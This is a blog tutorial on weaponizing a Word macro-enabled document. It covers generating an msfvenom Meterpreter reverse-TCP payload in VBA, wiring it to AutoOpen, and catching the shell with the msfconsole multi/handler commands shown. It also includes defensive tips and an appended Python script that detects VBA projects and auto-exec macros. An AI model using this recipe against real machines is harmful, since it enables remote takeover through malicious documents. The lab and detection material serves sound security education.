How Hackers Hijack PCs with Microsoft Office Macros!

0xm154n7hr0p3
Aug 3, 2023


DISCLAIMER

All this is for educational purposes only; I won’t be held responsible for such idiotic acts.

Prerequisites:

Kali Linux and Windows, both installed in virtual machines connected through a NAT network; there are plenty of sources out there on how to set this up.

Before we dive deep into how hackers use macros to gain access to machines, let's first understand what macros are.

Macros are pieces of code embedded in Microsoft Office documents, written in a programming language known as Visual Basic for Applications (VBA). In this article we will see how hackers/threat actors abuse this functionality to inject their own malicious code. In our proof of concept we will inject a simple reverse shell that lets us gain access to the target machine.

We will skip phishing and the delivery method because that is not the purpose of this article; we will focus only on the weaponization of the Microsoft Office document. In our case we are going to use Microsoft Word.

1. Creating the reverse shell:

We will use the Metasploit Framework (msfvenom) to create our payload by specifying:

- The type of payload: Meterpreter
- LHOST: our Kali IP address
- LPORT: the port to listen on
- -f: the output format we want; in our case vba (Visual Basic for Applications)

It will output this reverse shell:

Don't worry, you don't have to understand this code. All it does is connect back to our Kali machine at <LHOST>:<LPORT>, the address we provided, giving us access to the victim machine.

The Auto_Open() function is the one that contains the malicious shellcode (yes, that long run of numbers you see in the code), and AutoOpen() is a built-in entry point that Word runs the moment the document is opened, which is what triggers the code.

Make sure to copy this code; we will use it later.

Now, on a Windows machine THAT YOU OWN, create a Word document:

Click View => Macros.

Choose a name for your macro. I chose chicken_sandwich because I'm hungry right now and I'm craving one :(, but you could choose any name. Press Create and paste in the code you copied from Metasploit's msfvenom.

Press Ctrl+S, exit the editor, then save the file as a Word Macro-Enabled Document.

On your Kali machine, open msfconsole, then:

use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <your Kali machine IP address>
set LPORT <port you want to listen on>
exploit

On your Windows machine, open the weaponized Word document you created and you will immediately get a connection back on your Kali machine.

Pretty cool, right?! Now the threat actor can do all sorts of things, such as privilege escalation, lateral movement, and dumping hashes…

In conclusion:

Don't open Microsoft Office documents from unknown or untrusted sources, whether they arrive by email or any other way. Keep your system updated, use anti-malware (I recommend Malwarebytes), and always keep your macros disabled.
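As an added defensive example, not part of the original post: a small Python triage script that checks whether a Word file is the kind of macro-enabled document built above. It opens the OOXML zip container and reports an embedded vbaProject.bin part, the macro-enabled main-part content type, and any auto-exec procedure names such as AutoOpen. The sample documents it builds are constructed in memory and are stand-ins, not real Office files.

```python
import io
import zipfile

# Auto-executing VBA entry points; AutoOpen/Auto_Open are the ones the post relies on.
AUTO_EXEC_NAMES = (b"AutoOpen", b"Auto_Open", b"AutoExec", b"Document_Open", b"Workbook_Open")
# Main-part content type Word assigns to a Macro-Enabled Document, versus a plain .docx.
MACRO_ENABLED_CT = b"application/vnd.ms-word.document.macroEnabled.main+xml"
PLAIN_DOCX_CT = b"application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"


def triage_office_file(data: bytes) -> dict:
    """Triage an OOXML (.docx/.docm) file held in memory: does the zip carry a VBA
    project part, is it declared macro-enabled, and which auto-exec names appear?"""
    findings = {"has_vba_project": False, "macro_enabled_type": False, "auto_exec_hits": []}
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        findings["error"] = "not an OOXML container (legacy .doc/OLE2 or not an Office file)"
        return findings
    names = zf.namelist()
    vba_parts = [n for n in names if n.lower().endswith("vbaproject.bin")]
    findings["has_vba_project"] = bool(vba_parts)
    if "[Content_Types].xml" in names:
        findings["macro_enabled_type"] = MACRO_ENABLED_CT in zf.read("[Content_Types].xml")
    for part in vba_parts:
        blob = zf.read(part)
        # Module source inside vbaProject.bin is MS-OVBA compressed, so a raw byte search
        # is a heuristic only: names often survive as literal runs, but a real decompressor
        # (e.g. oletools' olevba) is the reliable way to read the macro body.
        for name in AUTO_EXEC_NAMES:
            if name in blob and name.decode() not in findings["auto_exec_hits"]:
                findings["auto_exec_hits"].append(name.decode())
    return findings


def build_sample(macro: bool) -> bytes:
    """Constructed sample, not a real document: a minimal OOXML zip with, when
    macro=True, a stand-in vbaProject.bin part that names an AutoOpen procedure."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        ct = MACRO_ENABLED_CT if macro else PLAIN_DOCX_CT
        zf.writestr("[Content_Types].xml", b'<Types><Override ContentType="' + ct + b'"/></Types>')
        zf.writestr("word/document.xml", b"<w:document/>")
        if macro:
            zf.writestr("word/vbaProject.bin", b"\x00PROJECT\x00Module=chicken_sandwich\x00Sub AutoOpen()\x00")
    return buf.getvalue()


if __name__ == "__main__":
    for label, doc in (("plain", build_sample(False)), ("macro", build_sample(True))):
        print(label, triage_office_file(doc))
```

Run it against a real .docm from the walkthrough by reading the file bytes and passing them to triage_office_file; any hit on has_vba_project or an auto-exec name is reason to keep the file quarantined until a proper macro analysis tool has looked at it.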
